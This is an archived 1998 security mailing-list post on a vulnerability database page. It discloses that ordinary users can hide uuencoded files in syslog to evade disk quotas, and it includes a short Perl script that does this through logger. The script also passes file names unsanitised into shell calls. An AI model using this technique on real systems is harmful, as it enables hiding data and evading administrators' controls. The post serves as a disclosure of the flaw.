Lucene search
putsyslog.txt
Users can hide files in syslog and extract them later using a script for logging messages.
Show more
`
[ http://www.rootshell.com/ ]
From [email protected] Wed Jul 8 10:18:27 1998
Date: Wed, 8 Jul 1998 19:08:41 +0200
From: Paul Boehm <[email protected]>
To: [email protected]
Subject: putsyslog
hi,
users can write messages to syslog and thus hide files in there and
bypass quotas.. later they can extract it if they have read access
to the logfile. i already wrote a perl script that puts an uuencoded
file in syslog... but now im too lazy to write a script/program to
extract it.. anyway, here's putsyslog:
--snip--
#!/usr/bin/perl
#Putsyslog - puts a file in syslog using logger and uuencode
# maybe i'll write a getsyslog someday.. but rather not
#
# [email protected]
$file = shift || "file";
$loglevel = shift || "daemon.info"; # something that goes
# to a pub readable
# logfile
open(UU,"uuencode $file $file |");
while (<UU>) {
chomp;
s/\\/\\\\/g;
s/\"/\\"/g;
s/\'/\\'/g;
s/\`/\\`/g;
system("logger -p $loglevel \"[PUTFILE] $file $_\"\n");
}
close(UU);
print "done logging $file to $loglevel\n";
--snip--
--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Name: Paul S. Boehm || Freelance Security Consultant.
Email: [email protected] || PGPkey available at:
Url: http://paul.boehm.org/ || http://paul.boehm.org/paul-pgp.asc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
There is is no reason for any individual to have a computer in their home.
--Ken Olsen (Digital Corp CEO) 1977.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4